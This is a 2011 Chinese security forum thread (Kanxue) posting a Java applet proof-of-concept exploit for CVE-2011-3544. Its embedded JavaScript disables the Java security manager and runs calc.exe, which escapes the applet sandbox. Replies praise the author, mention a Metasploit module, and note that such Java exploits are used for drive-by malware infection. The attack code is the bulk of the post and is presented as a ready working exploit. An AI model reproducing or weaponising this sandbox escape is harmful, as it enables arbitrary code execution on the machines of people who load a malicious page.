首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 二进制漏洞
    3. 发新帖
[原创] 新鲜出炉 - CVE-2011-3544 POC
发表于: 2011-11-30 14:45 10477

[原创] 新鲜出炉 - CVE-2011-3544 POC

古河 活跃值
6
2011-11-30 14:45
10477

import java.applet.Applet;

import javax.script.*;

import javax.swing.JList;

public class ScriptEngineExp extends Applet {

	
	private JList list;
	
    public void init() {

        try {

            ScriptEngine se = new ScriptEngineManager().getEngineByName("js");
            
            se.eval("var error = new Error(\"My error\");" +
            		"this.toString = function(){ " +
            		"java.lang.System.setSecurityManager(null);" +
            		"java.lang.Runtime.getRuntime().exec(\"calc.exe\");" +
            		"return \"exploit!\";};" +
            		"error.message = this;");
        
            list = new JList(new Object[]{se.get("error")});
            
            this.add(list);

        } catch (ScriptException ex) {

            ex.printStackTrace();

        }

    }


}

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 7
支持
分享
最新回复 (13)
Fido
雪    币: 107
活跃值: (404)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
2
太强大了啊...............学习了..
2011-11-30 16:54
0
jerrynpc
雪    币: 284
活跃值: (16)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
3
膜拜古河大神
2011-11-30 17:58
0
instruder
雪    币: 146
活跃值: (182)
能力值: ( LV13,RANK:220 )
在线值:
发帖
回帖
粉丝
私信
4
貌似java从来就没有更新成功过......
2011-11-30 18:44
0
古河
雪    币: 822
活跃值: (380)
能力值: ( LV12,RANK:310 )
在线值:
发帖
回帖
粉丝
私信
5
其实Java Exploit危害还是很大的,毕竟装机量大
特别是像这种类型的exploit,直接绕过沙盒,又不需要溢出或攻击内存错误,直接无视DEP+ASLR

最近这一年用Java Exploit挂马呈明显上升趋势
2011-11-30 19:06
0
gwJiang
雪    币: 55
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
6
人家是german,你懂的
2011-11-30 22:28
0
邓韬
雪    币: 278
活跃值: (709)
能力值: ( LV15,RANK:520 )
在线值:
发帖
回帖
粉丝
私信
7
不懂,膜拜楼上各位大侠!
2011-11-30 22:34
0
zuoyefeng
雪    币: 237
活跃值: (15)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
8
啊啊啊啊啊啊~~~~
还是有人注意到了
还是有人爆了
2011-11-30 22:44
0
KiDebug
雪    币: 544
活跃值: (264)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
私信
9
古河样样精通啊!膜拜ing....
2011-11-30 23:40
0
weizi
雪    币: 22
活跃值: (868)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
私信
10
msf已经有了,java rhino。
试了一下,在xp下java 1.6.26下是可以拿到权限的。
2011-12-1 21:49
0
wingdbg
雪    币: 393
活跃值: (150)
能力值: (RANK:110 )
在线值:
发帖
回帖
粉丝
私信
11
这个POC该怎么测试?
2011-12-1 22:06
0
沙滩鱼
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
12
膜拜大神
2011-12-2 09:19
0
OnlyLoveMM
雪    币: 51
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
13
是啊,我也膜拜。
2011-12-6 09:42
0
dabaosod
雪    币:
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
14
膜拜古河大神神帖!
2011-12-21 09:00
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//